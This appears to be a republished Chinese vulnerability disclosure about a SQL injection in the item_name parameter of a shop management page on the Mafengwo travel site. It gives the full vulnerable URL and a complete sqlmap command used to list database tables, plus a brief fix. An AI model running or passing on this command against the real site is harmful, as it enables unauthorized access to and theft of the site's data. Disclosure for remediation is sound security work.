蚂蜂窝主站SQL注入漏洞下载

蚂蜂窝主站SQL注入漏洞可致数据库信息泄露 SQLMAP 验证(仅演示取得数据表名称,仅为证明危害,不再继续深入)
漏洞位置:

http://www.mafengwo.cn/shop/mgr_item.php?act=add&item_name=lgkcaleg&item_price=1&shop_id=100597

参数item_name没有过滤

SQLMAP 跑表演示

注意是用 level 5 测试的,复现漏洞时别忘了

 

C:\Users\Administrator>sqlmap.py -u "www.mafengwo.cn/shop/mgr_item.php?act=add&item_name=lgkcaleg&item_price=1&shop_id=100597" -p item_name --tables --dbms=mysql --technique T --level 5

修复方案:

过滤所示参数,严格控制用户输入

 

上一篇: [公开漏洞]万达分站可以getshell
下一篇: [公开漏洞]UC浏览器电脑版某处持久xss
当前位置:站长啦网站目录 » 站长资讯 » 站长新闻 » 漏洞预警 » 文章详细